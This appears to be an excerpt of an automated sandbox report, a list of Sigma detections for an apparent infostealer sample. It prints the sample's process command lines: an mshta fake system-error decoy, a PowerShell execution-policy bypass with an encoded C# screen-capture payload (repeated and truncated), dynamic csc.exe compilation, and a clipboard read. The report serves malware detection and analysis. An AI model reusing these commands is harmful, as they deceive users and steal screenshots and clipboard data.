            Sigma detected: MSHTA Suspicious Execution 01
            Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1312, ParentProcessName: cmd.exe, ProcessCommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", ProcessId: 2108, ProcessName: mshta.exe
            Sigma detected: Suspicious Encoded PowerShell Command Line
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Sigma detected: Suspicious PowerShell Encoded Command Patterns
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Sigma detected: Console CodePage Lookup Via CHCP
            Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2080, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 6868, ProcessName: chcp.com
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
            Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\rename_me_before.exe", ParentImage: C:\Users\user\Desktop\rename_me_before.exe, ParentProcessId: 3512, ParentProcessName: rename_me_before.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 2588, ProcessName: cmd.exe
            Sigma detected: Suspicious Execution of Powershell with Base64
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAG